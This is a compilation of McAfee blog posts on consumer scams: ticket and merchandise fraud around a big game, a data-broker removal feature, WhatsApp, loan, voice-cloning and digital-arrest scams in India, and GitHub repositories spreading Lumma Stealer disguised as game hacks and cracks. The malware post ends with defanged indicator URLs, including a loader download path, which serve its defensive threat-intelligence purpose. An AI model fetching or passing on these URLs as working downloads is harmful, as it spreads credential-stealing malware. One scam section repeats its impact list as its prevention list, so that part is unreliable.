Super Scams – Beat the Online Scammers Who Want to Sack Your Big Game

Cybercriminals will always try to cash in on a good thing, and football is no exception. Online scammers are ramping up for the big game with all types of schemes designed to rip you off and steal your personal info—but you have several ways you can beat them at their game.  

Like shopping holidays, tax season, and even back-to-school time, scammers take advantage of annual events that get people searching for deals and information online. You can include big games and tournaments in that list too. 

Specific to this big game, you can count on several types of scams to rear their heads this time of year—ticket scams, merchandise scams, betting scams, and phony sweepstakes as well. They’re all in the mix, and they’re all avoidable. Here, we’ll break them down. 

Keep an eye out for ticket scams. 

As of two weeks out, tickets for the big game on the official ticketing website were going for $6,000 or so, and that was for the so-called “cheap seats.” Premium seats in the lower bowl 50-yard line, sold by verified resellers, were listed at $20,000 a pop or higher.  

While the game tickets are now 100% mobile, that hasn’t prevented scammers from trying to pass off phony tickets as the real deal. They’ll hawk those counterfeits in plenty of places online, sometimes in sites like your friendly neighborhood Craigslist.  

So if you’re in the market for tickets, there are certainly a few things to look out for: 

• First off, the safest bet is to purchase tickets through the official marketplaces of the NFL with a 100% ticket guarantee. 
• If someone is selling physical tickets, it’s a scam. As mentioned above, tickets are now 100% mobile. 
• If you see so-called deals for tickets that are going well below the current rate, you can practically bet that’s a scam as well. 
• Another sign of a scam, is someone is asking for payment by a payment app like Venmo or by wire transfer or even crypto. These payment methods work like cash, meaning that if you pay a scammer with them, your money is good as gone.  

Look out for online merch scams. 

If you plan on enjoying the game closer to home, you may be in the market for some merch—a hat, a jersey, a tee, or maybe some new mugs for entertaining when you host the game at your place. With all the hype around the game, out will come scammers who set up bogus online stores. They’ll advertise items for sale but won’t deliver—leaving you a few dollars lighter and the scammers with your payment information, which they can use on their own for identity fraud. 

You can shop safely with a few straightforward steps: 

Stick with known, legitimate retailers online for your merch. 

This is a great one to start with. Directly typing in the correct address for reputable online stores and retailers is a prime way to avoid scammers online. In the case of retailers that you don’t know much about, the U.S. Better Business Bureau (BBB) asks shoppers to do their research and make sure that retailer has a good reputation. The BBB makes that easier with a listing of retailers you can search simply by typing in their name. 

If you feel like doing extra sleuthing, look up the address of the website and see when it was launched. A visit to the Internet Corporation for Assigned Names and Numbers (ICANN) at ICANN.org gives you the option to search a web address and see when it was launched, along with other information about who registered it. While a recently launched site is not an indicator of a scam site alone, sites with limited track records may give you pause if you want to shop there—particularly if there’s a chance it was just propped up by a scammer.  

Look for the lock icon in your browser when you shop. 

Secure websites begin their address with “https,” not just “http.” That extra “s” in stands for “secure,” which means that it uses a secure protocol for transmitting sensitive info like passwords, credit card numbers, and the like over the internet. It often appears as a little padlock icon in the address bar of your browser, so double-check for that. If you don’t see that it’s secure, it’s best to avoid making purchases on that website. 

Use a secure payment method other than your debit card. 

Credit cards are a good way to go. One reason why is the Fair Credit Billing Act, which offers protection against fraudulent charges on credit cards by giving you the right to dispute charges over $50 for goods and services that were never delivered or otherwise billed incorrectly. Your credit card companies may have their own policies that improve upon the Fair Credit Billing Act as well. Debit cards don’t get the same protection under the Act.  

Get online protection. 

Comprehensive online protection software will defend against the latest virus, malware, spyware, and ransomware attacks plus further protect your privacy and identity. In addition to this, it can also provide strong password protection by generating and automatically storing complex passwords to keep your credentials safer from hackers and crooks who may try to force their way into your accounts. And, specific to the scams floating around this time of year, online protection can help prevent you from clicking links to known or suspected malicious sites. 

Placing a bet? Make it a safe(r) one. 

It’s hard to watch sports these days without odds and stat lines popping up onto the screen, along with a fair share of ads that promote online betting. If you’re thinking about making things interesting with some betting, keep a few things in mind: 

• As of January 2023, online betting is live and legal in some form across 32 states in the U.S., with “live and legal” meaning that sports betting is legally offered through retail and/or online sportsbooks. Where you can bet and how you can bet varies from state to state, and this interactive map can show you the details for yours. 
• Stick with the legal mobile betting apps and sites in your state, which you can also view via the interactive map linked above. Yet it shouldn’t come as a surprise that scam betting sites have cropped up. According to the Better Business Bureau (BBB), they’ve received plenty of complaints. “You place a bet, and, at first, everything seems normal. But as soon as you try to cash out your winnings, you find you can’t withdraw a cent. Scammers will make up various excuses,” says the BBB. 
• Also, read the fine print on those promo offers that betting sites and apps advertise. Chances are you’ve seen the commercials with all manner of special sign-up bonuses. The BBB advises people to closely read the terms and conditions behind those offers. For one, “Gambling companies can restrict a user’s activity,” meaning that they can freeze accounts and the funds associated with them based on their terms and conditions. Also, the BBB cautions people about those promo offers that are often heavily advertised, “[L]ike any sales pitch, these can be deceptive. Be sure to read the fine print carefully.”  
• In addition to choosing a state-approved option, check out the organization’s BBB listing at BBB.org. Here you can get a snapshot of their BBB rating, complaints registered against them, and the organization’s response to those complaints if they have chosen to respond. Doing a little reading here can be enlightening. It can show you what complaints typically arise, and how the organization has historically addressed them. 

Watch out for phony sweepstakes and prizes too. 

As it is every year, you’ll see kinds of sweepstakes and giveaways leading up to the game, plenty of them legitimate. Yet as they do, scammers will try and blend in by rolling out their own bogus promotions. Their aim: to part you from your cash or even your personal information. 

A quick way to sniff out these scams is to take a close look at the promotion. For example, if it asks you to provide your bank information to send you your prize money, count on it being a scam. Likewise, if the promotion asks you to pay to claim a prize in some form or other, it’s also likely someone’s trying to scam you.  

In all, steer clear of promotions that ask something for something in return, particularly if it’s your money or personal information. 

Enjoy your big game. 

As it is of late, all kinds of scams will try to glom onto the big game this year. And some of the best advice for avoiding them is not to give in to the hype. Scammers prey on scarcity, a sense of urgency, and keyed-up emotions in general. Their hope is that these things may make you less critical and more likely to overlook things that would otherwise seem sketchy or too good to be true. Staying focused as you shop, place a wager, or otherwise look to round out your enjoyment of the big game is some of your absolute best defense against scammers right now, and any time. 

The post Super Scams – Beat the Online Scammers Who Want to Sack Your Big Game appeared first on McAfee Blog.

Introducing Personal Data Cleanup

We’re excited to announce the release of McAfee’s Personal Data Cleanup, a new feature that finds and removes your personal info from data brokers and people search sites. Now, you can feel more confident by removing personal info from data broker sites and keeping it from being collected, sold, and used to: advertise products to you, fill your email box with spam, and can even give criminals the info they need to steal your identity. Let’s look at why we’re offering McAfee Personal Data Cleanup, how it protects your privacy, and why it’s a great addition to the online protection we already offer. 

Does the cost of a connected life have to be your privacy?

There’s so much to enjoy when you live a connected life – free email, online stores that remember what you like, social media that connects you to friends and influencers. It’s a world of convenience, opportunity, and incredible content. It’s also a world where your data is constantly collected.  

“Wait. Did you say my data?” 

That’s right, companies are collecting your personal data. They’re called data brokers and they make money by selling information that specifically identifies you, like an email address. They sell this information to marketers looking to target you with ads. Criminals can also use it to build profiles in service of stealing your identity and accessing your accounts. This activity takes place behind the scenes and often without consumers’ knowledge.  There are also data brokers known as people search sites that compile and sell info like home addresses, emails, phones, court records, employment info, and more. These websites give identity thieves, hackers, stalkers, and other malicious actors easy access to your info. Regardless of how your data is being used, it’s clear that these days a more connected life often comes at the cost of your privacy.  

Consumers are clamoring for more privacy online 

In a recent survey of McAfee customers, we found that 59% have become more protective of their personal data over the past six months. And it’s no wonder. Over the past two years, trends like telehealth, remote working, and increased usage of online shopping and financial services have meant that more of your time is being spent online. Unsurprisingly, more personal data is being made available in the process. This leads us to the most alarming finding of our survey – 95% of consumers whose personal information ends up on data broker sites had it collected without their consent.  

 

Free to enjoy privacy online with McAfee’s Personal Data Cleanup 

We created Personal Data Cleanup to make it easy for you to take back your privacy online. McAfee’s Personal Data Cleanup regularly scans the riskiest data broker sites for info like your home address, date of birth, and names of relatives. After showing where we found your data, you can either remove it yourself or we will work on your behalf to remove it. Here’s how it works: 

• Set up 

• • Input your name, date of birth, and home address. 

• Scan:  

• • We scan this against some of the riskiest data broker sites 

• Review 

• • Within minutes, we’ll show you where we found your personal info, and what info the sites have. 

• Remove 

• • You can manually go to each site and request that your data be removed OR upgrade to have McAfee manage the removal process on your behalf. 

• Ongoing 

• • Your info can reappear as data brokers continually collect data. To ensure ongoing protection, Personal Data Cleanup enables regular scanning so it can be removed. 

Start using McAfee’s Personal Data Cleanup right now 

Ready to take back your personal info online? Personal Data Cleanup is available immediately with most of our online protection plans. If you have an eligible subscription, you can start using this new feature through McAfee Protection Center, or you can get McAfee online protection here.

The post Introducing Personal Data Cleanup appeared first on McAfee Blog.

Rising Scams in India: Building Awareness and Prevention

Authored by Anuradha, Sakshi Jaiswal 

In 2024, scams in India have continued to evolve, leveraging sophisticated methods and technology to exploit unsuspecting individuals. These fraudulent activities target people across demographics, causing financial losses and emotional distress. This blog highlights some of the most prevalent scams this year, how they operate, some real-world scenarios, tips to stay vigilant and what steps to be taken if you become a victim.

This blog covers the following scams:

1. WhatsApp Scam
2. Instant Loan Scam
3. Voice Cloning Scam
4. Credit Card Scam
5. Fake Delivery Scam
6. Digital Arrest Scam

1.WhatsApp Scam:

Scam Tactics:

Fraudsters on WhatsApp employ deceptive tactics to steal personal information, financial data, or gain unauthorized access to accounts. Common tactics include:

• Phishing Links: Messages with fake links mimicking trusted organizations, urging users to verify their accounts or claim rewards.
  Example: “Your account will be deactivated! Click here to verify your number now.”

Case 1: In the figure below, a user is being deceived by a message originating from the +244 country code, assigned to Angola. The message offers an unrealistic investment opportunity promising a high return in just four days, which is a common scam tactic. It uses pressure and informal language, along with a link for immediate action.

 

Case 2: In the figure below, a user is being deceived by a message originating from the +261 country code, assigned to Madagascar. The message claims that you have been hired and asks you to click a link to view the offer or contact the sender which is a scam.

• Impersonation: Scammers hijack or mimic contacts to ask for urgent financial help.
  Example: “Hey, it’s me! I lost my wallet. Can you send me ₹5,000?”
• Fake Job Offers: Messages promising high earnings from home to lure victims into scams.
  Example: “Earn ₹10,000 daily! Contact us to start now!”

Case 3: In the figure below, a user is being deceived by a message originating from the +91 country code, assigned to India. Scammers may contact you, posing as representatives of a legitimate company, offering a job opportunity. The recruiter offers an unrealistic daily income (INR 2000–8000) for vague tasks like searching keywords, which is suspicious. Despite requests, they fail to provide official company details or an email ID, raising credibility concerns. They also ask for personal information prematurely, a common red flag.

Case 4: In the figure below, a user is being deceived by a message originating from the +84 country code, assigned to Vietnam. The offer to earn money by watching a video for just a few seconds and providing a screenshot is a common tactic used by scammers to exploit individuals. They may use the link to gather personal information, or your action could lead to phishing attempts.

Case 5: In the figure below, a user is being misled by a message originating from the country codes +91, +963, and +27, corresponding to India, Syria, and South Africa, respectively. The message claims to offer a part-time job with a high salary for minimal work, which is a common tactic used by scammers to lure individuals. The use of popular names like “Amazon” and promises of easy money are red flags. The link provided might lead to phishing attempts or data theft. It’s important not to click on any links, share personal details, or respond to such unsolicited offers.

Case 6: The messages encourage you to post fake 5-star reviews for businesses in exchange for a small payment, which is unethical and often illegal. Scammers use such tactics to manipulate online ratings, and the provided links could lead to phishing sites or malware. Avoid engaging with these messages, clicking on the links, or participating in such activities.

 

• Lottery/Giveaway Fraud: Claims of winning a prize, requiring advance payments or sharing bank details.
  Example: “Congrats! You’ve won ₹1,00,000 in the WhatsApp Lottery. Share your bank details to claim.”
• Malware Links: Messages containing harmful links disguised as videos, photos, or documents, designed to infect your device.
  Example: “Look at this amazing video! [malicious link]”
• Wedding Invite Scam: Fraudsters send fake wedding invitations with malicious links. Clicking the links can download .apk file and install malware, steal personal or financial information, or gain unauthorized access to a WhatsApp account. Always verify the sender and avoid clicking suspicious links.
• Verification Code Theft: Fraudsters trick users into sharing their WhatsApp verification codes, enabling account hijacking.

How to Identify WhatsApp Scams:

• Unsolicited Messages: Be cautious of unexpected messages, especially from unknown numbers.
• Sense of Urgency: Scammers often create panic, pressuring you to act quickly.
• Poor Language: Messages may contain spelling or grammatical errors, indicating they are not from legitimate sources.
• Generic Greetings: Messages lack personalization, such as using “Dear Customer” instead of your name.
• Too Good to Be True Offers: High-value rewards, jobs, or opportunities with no clear justification.
• Suspicious Links: Shortened or unrecognizable URLs that redirect to fake websites.

Impact:

• Financial Loss: Victims may transfer money or share bank details, resulting in unauthorized transactions.
• Identity Theft: Personal information can be misused for fraudulent activities.
• Account Hijacking: Losing access to your WhatsApp account if verification codes are shared.
• Privacy Breach: Sensitive data from your chats or device can be exploited.
• Emotional Distress: Scams can cause stress, anxiety, and a loss of trust in technology or personal relationships.

Prevention:

• Verify Sender Identity: Confirm any request for money or sensitive information directly with the person through alternate means.
• Avoid Clicking on Links: Always verify the legitimacy of links before clicking.
• Enable Two-Step Verification: Secure your WhatsApp account with a PIN for added protection.
• Restrict Profile Access: Adjust privacy settings to limit who can view your profile photo, status, and other details.
• Be Cautious of Urgent Requests: Fraudulent messages often pressure you to act immediately. Take a moment to evaluate.
• Check Authenticity: Research offers or schemes mentioned in messages to ensure they are legitimate.
• Report and Block: Use WhatsApp’s “Report” feature to flag suspicious contacts and block them.

 

2. Instant Loan Scam:

Scam Tactics:

• Fake Loan Apps or Websites: Scammers create fake loan apps or websites that appear legitimate. They promise easy loans with minimal requirements and fast disbursements.
• Personal Information Harvesting: To apply for these loans, victims are asked to provide sensitive personal information, such as bank details, Aadhaar numbers, and other financial information.
• Advance Fee Demand: Once the application is submitted, the scammers claim that an advance fee, processing charge, or security deposit is required before the loan can be disbursed.
• Excessive Interest Rates: If the loan is approved, it often comes with extraordinarily high interest rates or hidden charges, leading the borrower into a debt trap.
• Threats and Harassment: If the victim is unable to repay the loan, scammers may use aggressive tactics, including blackmail, threats of legal action, or public humiliation to force repayment.

How to Identify Instant Loan Scam:

• Unsolicited Offers: Be wary of loan offers you receive unexpectedly via calls, emails, or ads.
• Too Good to Be True: If the loan offer seems unusually easy, with little paperwork or no credit checks, it’s likely a scam.
• Advance Fees: Genuine lenders never ask for upfront payments before disbursing a loan.
• Excessive Interest Rates: Watch out for loans with outrageously high interest rates or hidden fees.
• Unprofessional Communication: Look for red flags like poorly written messages or vague, generic offers.
• Pressure to Act Fast: Scammers often create urgency, pushing you to make quick decisions without proper verification.

Impact:

• Financial Losses: Victims are often tricked into paying exorbitant fees, with no loan ever being disbursed, or receiving loans with unaffordable repayment terms.
• Emotional Distress: The constant harassment, along with the fear of financial ruin, leads to significant emotional and mental stress for victims.

Prevention:

• Verify Loan Providers: Always check the legitimacy of loan apps or websites by reading reviews and verifying their authenticity through trusted sources.
• Avoid Sharing Sensitive Information: Never share personal or financial information unless you’re sure of the legitimacy of the platform.
• Report Suspicious Platforms: If you come across a suspicious loan provider, report it to relevant authorities like the Reserve Bank of India (RBI) or consumer protection agencies.
• Be Cautious with Quick Loans: Instant loans with no credit checks or paperwork should raise immediate suspicion. Always read the terms and conditions carefully.

 

3. Voice-Cloning Scam:

Voice-cloning scams use advanced AI technology to replicate the voices of familiar people, such as friends, family members, or colleagues, to manipulate victims into transferring money or providing sensitive information.

Scam Tactics:

• Impersonating Trusted Voices: Scammers use voice-cloning technology to mimic the voice of a person the victim knows, often creating a sense of trust and urgency.
• Urgent Requests for Money: The cloned voice typically claim an emergency, such as needing money for medical expenses or legal issues, pressuring the victim to act quickly.
• Sensitive Information Requests: Scammers may also use voice cloning to trick victims into revealing personal information, passwords, or financial details.

How to Identify AI Voice-Cloning Scams:

• Verify the Country Code: Check the country code of the incoming call to ensure it matches the expected location.
• Contact the Person Directly: If possible, reach out to the person through another method to confirm the authenticity of the call.
• Notice Changes in Speech Tone or Patterns: Be alert to any changes in the speaker’s tone or unnatural speech patterns that may indicate a scam.

Impact:

• Financial Losses
• Emotional and Psychological Stress

Prevention

• Verify the Caller: Always verify the caller’s identity through an alternative channel before proceeding with any action.
• Be Skeptical of Urgency: Take your time and evaluate urgent requests carefully, especially those involving money.
• Check the Country Code: Be cautious if the call comes from an unfamiliar country code.
• Listen for Inconsistencies: Pay attention to unusual speech patterns or background noises.
• Limit Information Sharing: Never share sensitive details over the phone unless you’re sure of the caller’s identity.
• Use Multi-Factor Authentication: Add extra security to sensitive accounts with multi-factor authentication.
• Stay Informed: Educate yourself and others, especially vulnerable individuals, about voice cloning scams.

 

4. Credit Card Scam:

Scam Tactics

Scammers use various methods to deceive victims into revealing credit card information or making unauthorized payments:

• Phishing: Fake emails, texts, or websites pretending to be from a legitimate entity (e.g., banks or online stores). Victims are tricked into providing card details or logging into a fake account portal.

• Skimming: Devices installed on ATMs or payment terminals capture card information. Hidden cameras or fake keypads may record PINs.

• Vishing (Phone Scams): Scammers impersonate bank representatives or government officials. They ask for credit card details, PINs, or OTPs to “resolve an issue.”

• Fake Online Shopping Websites: Fraudulent e-commerce sites offer deals to steal card details during fake transactions.

How to identify Credit card scam:

• Unsolicited Contact: Unexpected calls, emails, or messages asking for sensitive information.
• Urgency: Claims of account suspension or fraudulent activity requiring immediate action.
• Generic Greetings: Messages addressing you as “Dear Customer” or similar vague terms.
• Suspicious Links: Links in emails or texts that lead to fake websites.
• Unfamiliar Transactions: Small charges on your statement that you don’t recognize.

Impact:

• Loss of Money: Unauthorized purchases can drain your account.
• Identity Theft: Scammers can misuse your personal details.
• Credit Problems: Fraudulent charges could damage your credit score.
• Stress: Victims often face anxiety and frustration.
• Legal Issues: You may need to dispute fraudulent transactions.

Prevention:

• Don’t Share Card Details: Never share your card number, CVV, PIN, or OTP with anyone.
• Shop on Secure Websites: Only enter card details on sites with “https://” and a padlock icon.
• Avoid Suspicious Offers: Don’t click on links offering unbelievable discounts or rewards.
• Check Your Transactions: Regularly review your bank statements for unauthorized charges.
• Enable Alerts: Set up notifications for every card transaction to catch fraud early.
• Protect Your Card: Be cautious at ATMs and shops to avoid skimming.
• Use Virtual Cards: For online shopping, use one-time-use virtual cards if your bank provides them.
• Install Security Software: Keep your devices safe with antivirus software to block phishing attempts.
• Report Lost Cards: Inform your bank immediately if your card is lost or stolen.

 

5. Fake Delivery Scam:

Scam Tactics:

In fake delivery scams, fraudsters pose as delivery services to trick you into providing personal information, card details, or payment. Common tactics include:

• Phishing Messages: Scammers send texts or emails claiming there’s an issue with your package delivery. They include links to fake websites asking for payment or details.
• Example: “Your package couldn’t be delivered. Pay ₹50 to reschedule: [fake link].”
• Impersonation Calls: Fraudsters call pretending to be delivery agents, saying extra charges are needed to complete the delivery.
• Fake Delivery Attempts: A scammer posing as a delivery person asks for cash-on-delivery payment for a package you never ordered.
• Malware Links: Links in fake delivery notifications may install malware on your device, stealing sensitive information.

How to Identify Fake Delivery Scams:

• Unexpected Notifications: You receive a delivery message for a package you didn’t order.
• Urgent Payment Requests: The scam demands immediate action, such as paying a fee to receive your package.
• Suspicious Links: Links in the message look unusual or redirect to websites that don’t match the official delivery service.
• No Tracking Information: Legitimate delivery companies provide proper tracking numbers. Fake messages often lack these or give invalid ones.
• Unprofessional Communication: Scammers’ messages may contain spelling errors, awkward language, or lack the company’s official logo.

Impact:

• Financial Loss: Victims may lose money through fake payment requests.
• Personal Data Theft: Scammers can steal personal information like credit card details or addresses.
• Device Infection: Clicking on malicious links can infect your device with malware or spyware.
• Emotional Stress: Victims may feel anxious or distressed about being targeted.
• Identity Theft: Stolen data can be used for fraud, such as opening accounts in your name.

Prevention:

• Financial Loss: Victims may lose money through fake payment requests.
• Personal Data Theft: Scammers can steal personal information like credit card details or addresses.
• Device Infection: Clicking on malicious links can infect your device with malware or spyware.
• Emotional Stress: Victims may feel anxious or distressed about being targeted.
• Identity Theft: Stolen data can be used for fraud, such as opening accounts in your name.

 

6. Digital Arrest Scam

Scam Tactics:

Scammers pose as police officers or government officials, accusing victims of being involved in illegal activities like money laundering or cybercrime. They intimidate victims by threatening arrest or legal action unless immediate payment is made to “resolve the matter.”

• Impersonation and Urgency: Scammers pose as authorities, creating a sense of urgency with threats of arrest or legal consequences to pressure victims.
• Demands for Payment or Data: They demand immediate payments through untraceable methods or request sensitive personal information for identity theft.
• Deceptive Tactics: Techniques like fake documents, spoofed contacts, and social engineering are used to make the scam appear credible and manipulate victims.

How to Identify Digital Arrest Scam:

• Unsolicited Contact: Be cautious of unexpected calls or messages claiming to be from authorities.
• Urgency and Threats: Scammers often pressure victims with threats of immediate arrest unless payment is made.
• Requests for Payment: Legitimate authorities don’t ask for payment over the phone.
• Unverified Claims: Always verify legal claims by contacting authorities directly through official channels.
• Isolation Tactics: If asked not to consult others, it’s a red flag.
• Sensitive Information Requests: Never share personal or financial details over the phone.
• Unprofessional Communication: Look for poorly written or vague messages.

Impact: Daily losses from such scams run into lakhs, as victims panic and transfer money or provide sensitive information under pressure.

Prevention:

• Verify any claims of legal accusations directly with the authorities.
• Avoid sharing personal or financial information over the phone.
• Remember: Genuine law enforcement agencies do not demand payment over the phone.

What to Do if You Fall Victim

If you’ve fallen victim to any of the mentioned scams—Digital Arrest Scam, Instant Loan Scam, Voice Cloning Scam, WhatsApp Scam, Fake Delivery Scam or Credit Card Scam—it’s important to take immediate action to minimize damage and protect your finances and personal information. Here are common tips and steps to follow for all these scams:

1. Report the Scam Immediately:

• File a Complaint: Report the scam to your local authorities or cybercrime cell. In India, you can file complaints with the Cyber Crime Portal or your local police station. For instant assistance, Dial 1930 to report cybercrime.
• Inform Your Bank/Financial Institution: If you’ve shared financial details (e.g., bank account or credit card info), contact your bank or credit card provider immediately to block any transactions and prevent further losses.
• Contact Your Mobile Service Provider: For scams involving SIM cards or mobile-based fraud (like voice cloning or WhatsApp scams), reach out to your service provider to block the number or disable the SIM.

2. Secure Your Online Accounts:

• Change Passwords: Immediately change passwords for any accounts that may have been compromised (banking, email, social media). Use strong, unique passwords for each account.
• Enable Two-Factor Authentication (2FA): Activate two-factor authentication on your important accounts (e.g., email, bank, social media) to add an extra layer of security.
• Review Account Activity: Look for unauthorized transactions or changes to your account settings and report them.

3. Monitor Your Financial Statements:

• Bank and Credit Card Statements: Regularly check your financial statements for unauthorized transactions. If you see any suspicious activity, report it to your bank immediately.
• Freeze Your Credit: In cases of credit card scams or loan-related fraud, consider placing a freeze on your credit with major credit bureaus to prevent new accounts from being opened in your name.

4. Do Not Respond to Unsolicited Messages:

• If you receive unsolicited calls, messages, or emails asking for personal information, do not respond. Scammers often use these methods to steal sensitive data.
• Do not click on links or download attachments from unknown sources.

5. Be Cautious with Personal Information:

• Never share sensitive information like your PIN, passwords, or OTP over the phone or through insecure channels like SMS or email.
• Digital Arrest Scam: If you receive a threatening message about being arrested, verify the information through official government sources or your local police. Authorities will never demand payment for legal issues.

6. Report the Phone Number/Email:

• If the scam came via WhatsApp, SMS, or phone calls, report the number to the respective platform. For WhatsApp, you can block the number and report it directly in the app. Similarly, report phishing emails to your email provider.

7. Preserve Evidence:

• Save Screenshots or Records: Keep any evidence (messages, emails, screenshots, etc.) that can be used to investigate the scam. These may be useful when filing a complaint or disputing fraudulent transactions.

8. Educate Yourself and Others:

• Stay informed about the latest scams and fraud tactics. Being aware of common signs of scams (e.g., too-good-to-be-true offers, urgent demands for money, etc.) can help you avoid future threats.

 

Conclusion:

As scams in India continue to grow in number and sophistication, it is crucial to raise awareness to protect individuals and businesses from falling victim to these fraudulent schemes. Scams such as phishing, fake job offers, credit card scams, loan scams, investment frauds and online shopping frauds are increasingly targeting unsuspecting victims, causing significant financial loss and emotional harm.

By raising awareness of scam warning signs and encouraging vigilance, we can equip individuals to make safer, more informed decisions online. Simple precautions, such as verifying sources, being cautious of unsolicited offers, and safeguarding personal and financial information, can go a long way in preventing scams.

It is essential for both individuals and organizations to stay informed and updated on emerging scam tactics. Through continuous awareness and proactive security measures, we can reduce the impact of scams, ensuring a safer and more secure digital environment for everyone in India.

The post Rising Scams in India: Building Awareness and Prevention appeared first on McAfee Blog.

GitHub’s Dark Side: Unveiling Malware Disguised as Cracks, Hacks, and Crypto Tools

Authored by Aayush Tyagi

Video game hacks, cracked software, and free crypto tools remain popular bait for malware authors. Recently, McAfee Labs uncovered several GitHub repositories offering these tempting “rewards,” but a closer look reveals something more sinister. As the saying goes, if it seems too good to be true, it probably is.

GitHub is often exploited for malware distribution due to its accessibility, trustworthiness, and developer-friendly features. Attackers can easily create free accounts and host repositories that appear legitimate, leveraging GitHub’s reputation to deceive users.

McAfee Labs encountered multiple repositories, offering game hacks for top-selling video games such as Apex Legends, Minecraft, Counter Strike 2.0, Roblox, Valorant,
Fortnite, Call of Duty, GTA V and or offering cracked versions of popular software and services, such as Spotify Premium, FL Studio, Adobe Express, SketchUp Pro, Xbox Game Pass, and Discord to name a few.

Executive summary

These attack chains begin when users would search for Game Hacks, cracked software or tools related to Cryptocurrency on the internet, where they would eventually come across GitHub repositories or YouTube Videos leading to such GitHub repositories, offering such software.

We noticed a network of such repositories where the description of software keeps on changing, but the payload remains the same: a Lumma Stealer variant. Every week, a new set of repositories with a new malware variant is released, as the older repositories are detected and removed by GitHub. These repositories also include distribution licenses and software screenshots to enhance their appearance of legitimacy.

 

Figure 1: Attack Vector

These repositories also contain instructions on how to download and run the malware and ask the user to disable Windows Defender or any AV software, before downloading the malware. They provide the reasoning that, since the software is related to game hacks or by-passing software authentication or crypto-currency mining, AV products will detect and delete these applications.

This social engineering technique, combined with the trustworthiness of GitHub works well in the favor of malware authors, enabling them to infect more users.

Children are frequently targeted by such scams, as malware authors exploit their interest in game hacks by highlighting potential features and benefits, making it easier to infect more systems.

 

Technical Analysis

As discussed above, the users would come across malicious repositories through searching the internet (highlighted in red).

Figure 2: Internet Search showing GitHub results.

Or through YouTube videos, that contain a link to the repository in the description (highlighted in red).

Figure 3: YouTube Video containing malicious URL in description.

 

Once the user accesses the GitHub repository, it contains a Distribution license and other supporting files, to trick the user into thinking that the repository is genuine and credible.

Figure 4: GitHub repository containing Distribution license.

 

Repositories also contain a detailed description of the software and installation process further manipulating the user.

Figure 5: Download instructions present in the repository.

 

Sometimes, the repositories contain instructions to disable AV products, misleading users to infect themselves with the malware.

Figure 6: Instructions to disable Windows Defender.

 

To target more children, repositories contain a detailed description of the software; by highlighting all the features included within the package, such as Aimbots and Speed Hacks, and how easily they will be able to gain an advantage over their opponents.

They even mention that the package comes with advance Anti-Ban system, so their account won’t be suspended, and that the software has a popular community, to create a perception that, since multiple users are already using this software, it must be safe to use and that, by not using the software, they are missing out.

Figure 7: Features mentioned in the GitHub repository.

 

The downloaded files, in most cases, were Lumma Stealer variants, but observing the latest repositories, we noticed new malware variants were also being distributed through the same infection vector.

Once the user downloads the file, they get the following set of files.

Figure 8: Files downloaded from GitHub repository.

 

On running the ‘Loader.exe’ file, as instructed, it iterates through the system and the registry keys to collect sensitive information.

Figure 9: Loader.exe checking for Login credentials for Chrome.

 

It searches for crypto wallets and password related files. It searches for a list of browsers installed and iterates through user data, to gather anything useful.

Figure 10: Loader.exe checking for Browsers installed on the system.

 

Then the malware connects to C2 servers to transfer data.

 Figure 11: Loader.exe connecting to C2 servers to transfer data.

This behavior is similar to the Lumma Stealer variants we have seen earlier.

 

 

Detection and Mitigation Strategies

McAfee blocks this infection chain at multiple stages:

1. URL blocking of the GitHub repository.

Figure 12: McAfee blocking URLs

2. Detecting downloaded malware.

Figure 13: McAfee blocking the malicious file

 

Conclusion and Recommendations

In conclusion, the GitHub repository infection chain demonstrates how cybercriminals exploit accessibility and trustworthiness of popular websites such as GitHub, to distribute malware like Lumma Stealer. By leveraging the user’s desire to use game hacks, to be better at a certain video game or obtain licensed software for free, they trick users into infecting themselves.

At McAfee Labs, we are committed to helping organizations protect themselves against sophisticated cyber threats, such as the GitHub repository technique. Here are our recommended mitigations and remediations:

1. Children are usually the prime targets for such scams, it is important to educate the young ones and teach them how to avoid such fishy websites.
2. Conduct regular training sessions to educate users about social engineering tactics and phishing schemes.
3. Install and maintain updated antivirus and anti-malware software on all endpoints.
4. Use network segmentation to limit the spread of malware within the organization.
5. Ensure all operating systems, software, and applications are kept up to date with the latest security patches.
6. Avoid downloading cracked software or visiting suspicious websites.
7. Verify URLs in emails, especially from unknown or unexpected sources.
8. Keep antivirus solutions updated and actively scanning.
9. Avoid downloading Game hacks or Crypto software from unofficial websites.
10. If possible, read reviews about the software you’re downloading and see what other users are saying about the malware.
11. Regularly patch browsers, operating systems, and applications.
12. Monitor the Temp folder for unusual or suspicious files.

Indicators of Compromise (IoCs)

As of publishing this blog, these are the GitHub repositories that are currently active.

File Type	SHA256/URLs
URLs	github[.]com/632763276327ermwhatthesigma/hack-apex-1egend
	github[.]com/VynnProjects/h4ck-f0rtnite
	github[.]com/TechWezTheMan/Discord-AllinOne-Tool
	github[.]com/UNDERBOSSDS/ESET-KeyGen-2024
	github[.]com/Rinkocuh/Dayz-Cheat-H4ck-A1mb0t
	github[.]com/Magercat/Al-Photoshop-2024
	github[.]com/nate24321/minecraft-cheat2024
	github[.]com/classroom-x-games/counter-str1ke-2-h4ck
	github[.]com/LittleHa1r/ESET-KeyGen-2024
	github[.]com/ferhatdermaster/Adobe-Express-2024
	github[.]com/CrazFrogb/23fasd21/releases/download/loader/Loader[.]Github[.]zip
	github[.]com/flashkiller2018/Black-Ops-6-Cheats-including-Unlocker-Tool-and-RICOCHET-Bypass
	github[.]com/Notalight/h4ck-f0rtnite
	github[.]com/Ayush9876643/r0blox-synapse-x-free
	github[.]com/FlqmzeCraft/cheat-escape-from-tarkov
	github[.]com/Ayush9876643/cheat-escape-from-tarkov
	github[.]com/Ayush9876643/rust-hack-fr33
	github[.]com/ppetriix/rust-hack-fr33
	github[.]com/Ayush9876643/Roblox-Blox-Fruits-Script-2024
	github[.]com/LandonPasana21/Roblox-Blox-Fruits-Script-2024
	github[.]com/Ayush9876643/Rainbow-S1x-Siege-Cheat
	github[.]com/Ayush9876643/SonyVegas-2024
	github[.]com/123456789433/SonyVegas-2024
	github[.]com/Ayush9876643/Nexus-Roblox
	github[.]com/cIeopatra/Nexus-Roblox
	github[.]com/Ayush9876643/m0dmenu-gta5-free
	github[.]com/GerardoR17/m0dmenu-gta5-free
	github[.]com/Ayush9876643/minecraft-cheat2024
	github[.]com/RakoBman/cheat-apex-legends-download
	github[.]com/Ayush9876643/cheat-apex-legends-download
	github[.]com/cIiqued/FL-Studio
	github[.]com/Ayush9876643/FL-Studio
	github[.]com/Axsle-gif/h4ck-f0rtnite
	github[.]com/Ayush9876643/h4ck-f0rtnite
